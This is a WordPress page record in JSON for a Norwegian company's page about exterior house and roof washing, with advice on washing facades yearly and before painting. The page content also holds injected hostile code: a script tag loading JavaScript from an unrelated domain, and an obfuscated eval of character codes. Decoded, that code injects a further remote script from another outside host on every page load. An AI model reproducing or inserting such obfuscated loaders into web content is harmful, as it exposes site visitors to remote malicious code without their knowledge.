{"id":4335,"date":"2020-11-17T17:59:33","date_gmt":"2020-11-17T17:59:33","guid":{"rendered":"http:\/\/ms24.no\/?page_id=4335"},"modified":"2020-11-17T18:05:44","modified_gmt":"2020-11-17T18:05:44","slug":"utvendig-husvask","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=4335","title":{"rendered":"Utvendig husvask"},"content":{"rendered":"<h2>Utvendig husvask\/takvask<\/h2>\n<p>Rengj\u00f8ring kan gj\u00f8re underverker for bygg, enten det er fasadevask og takvask p\u00e5 private hus eller industribygg. En effektiv runde med h\u00f8ytrykkspyler gj\u00f8r at bygget fremst\u00e5r mer innbydende, og er vel verdt investeringen.\n    <\/p>\n<h2>Hvor ofte b\u00f8r fasaden vaskes?<\/h2>\n<p>    Alle hus eller bygg b\u00f8r vaskes utvendig hvert \u00e5r. Slik reduseres begroing av sopp og alger. Da fjernes pollen og annen forurensning samtidig, som legger seg p\u00e5 tak og vegger.<br \/>\n    Fasadevask er spesielt viktig hvis du skal male huset. Rengj\u00f8ringen tar bort fett og skitt, slik at den nye malingen f\u00e5r bedre heft. Dersom det ligger fett og skitt under malingen, risikerer du at malingen flasser av.<\/p>\n<p><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Utvendig husvask\/takvask Rengj\u00f8ring kan gj\u00f8re underverker for bygg, enten det er fasadevask og takvask p\u00e5 private hus eller industribygg. En effektiv runde med h\u00f8ytrykkspyler gj\u00f8r at bygget fremst\u00e5r mer innbydende, og er vel verdt investeringen. Hvor ofte b\u00f8r fasaden vaskes? Alle hus eller bygg b\u00f8r vaskes utvendig hvert \u00e5r. Slik reduseres begroing av sopp og [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-4335","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4335"}],"version-history":[{"count":7,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4335\/revisions"}],"predecessor-version":[{"id":4343,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4335\/revisions\/4343"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}